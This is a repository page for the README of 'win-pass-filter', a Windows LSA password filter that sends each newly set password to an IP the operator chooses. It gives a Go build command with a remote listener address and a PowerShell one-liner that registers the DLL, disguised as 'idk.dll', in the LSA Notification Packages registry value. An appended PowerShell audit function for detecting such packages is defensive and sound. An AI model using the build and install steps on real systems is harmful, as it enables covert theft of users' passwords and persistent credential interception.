Windows Password Filter


Artifact Content

Artifact 852c2c475e9acbb034513e41e6f0bf0f0a9afcdf10fc5af559c7646a12e5a83d:

  • File README.md — part of check-in [f2dea56b19] at 2019-06-07 00:51:53 on branch trunk — Initial Commit (user: brimstone size: 918)

win-pass-filter
===============

_stolen from https://github.com/iDigitalFlame/redteam-tools_

This is a windows LSA password filter that sends the new password to an IP of
your choosing.

Build
-----

Simply build for windows with CGO enabled and the appropriate receiver listing
port.
```
GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags 'main.remote=192.168.0.100:4444'
```


Install
-------

Copy the `filter.dll` to somewhere like `c:\windows\system32\idk.dll` and
install with powershell
```
powershell -com "$a='idk';$b=(Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages').'Notification Packages'; Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value ""$b`r`n$a"""
```

If you change the name of the dll in `c:\windows\system32` then also update the
`$a` variable.

Reboot when finished.
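
A defender's check for the registry value the Install section modifies, as an added example that is not part of the README or the win-pass-filter project: it lists every LSA notification package, flags names outside an approved baseline, and reports the signature state of the DLL each name resolves to. The baseline (`scecli`, `rassfm`) and the function name are assumptions; use the list approved for your own build.

```powershell
# Added example: audit LSA notification packages (defensive check, not from the README).
# $Baseline is an assumption; replace it with the list approved for your own build.
function Get-LsaNotificationPackageAudit {
    param(
        [string[]]$Baseline = @('scecli', 'rassfm'),
        [string]$LsaKey = 'HKLM:\System\CurrentControlSet\Control\Lsa'
    )
    $raw = (Get-ItemProperty -Path $LsaKey -Name 'Notification Packages').'Notification Packages'
    # Tolerate entries that hold several names separated by whitespace or line breaks.
    $names = $raw | ForEach-Object { $_ -split '\s+' } | Where-Object { $_ }
    foreach ($name in $names) {
        # The README copies its DLL into System32, so that is where each name is resolved.
        $dll = Join-Path $env:SystemRoot "System32\$name.dll"
        $exists = Test-Path -LiteralPath $dll
        $sig = if ($exists) { Get-AuthenticodeSignature -LiteralPath $dll } else { $null }
        [pscustomobject]@{
            Package    = $name
            InBaseline = $Baseline -contains $name
            Path       = $dll
            Exists     = $exists
            Signature  = if ($sig) { $sig.Status } else { 'n/a' }
            Signer     = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            Modified   = if ($exists) { (Get-Item -LiteralPath $dll).LastWriteTimeUtc } else { $null }
        }
    }
}

# Unreviewed entries sort first: anything outside the baseline or without a
# valid signature should be investigated.
Get-LsaNotificationPackageAudit |
    Sort-Object InBaseline, Package |
    Format-Table -AutoSize
```

Run it from an elevated prompt; registry auditing on the `Control\Lsa` key gives the matching detection at the time the value is changed.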